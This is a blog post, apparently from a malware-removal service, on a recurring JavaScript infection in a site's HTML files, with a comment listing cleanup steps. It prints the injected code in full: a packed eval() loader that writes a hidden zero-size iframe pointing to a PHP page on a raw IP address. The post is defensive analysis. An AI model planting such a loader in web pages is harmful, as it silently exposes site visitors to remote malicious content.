Malware – tag5479347351

By RobertVirus Removal

Today, I found a javascript code, that contains tag5479347351 html tag.
The site was blocked by Avast and the malicious code breaks the html code and the site fall into pieces. The owner run Sucuri/Wordfence/Anti Malware and cleaned it couple of times, but this issue comes back.
After looking for the problem in the html files I found this code:

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|98||src|height|199|width|board||11|php|254|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

The code looks like this after formatting:

<tag5479347351>
</tag5479347351>
<script>
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return c.toString(36)
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[c.toString(a)] = k[c] || c.toString(a)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);', 26, 26, '|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|98||src|height|199|width|board||11|php|254|tag1|ram'.split('|'), 0, {}))
</script>
<tag5479347352>
</tag5479347352>

All html files are infected by this, so we need to open all html files that contains the malicious code and remove it.

2 thoughts on “Malware – tag5479347351

  2. Of course. 🙂

    The solution was:
    – download all files to my computer with FTP
    – in total commander search tag5479347351 within all files
    – open them in a text editor
    – replace the virus code with an empty string
    – upload the disinfected files

    And of course you need to update your wordpress and plugins, and recommended to review the PHP files for different malicious code.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.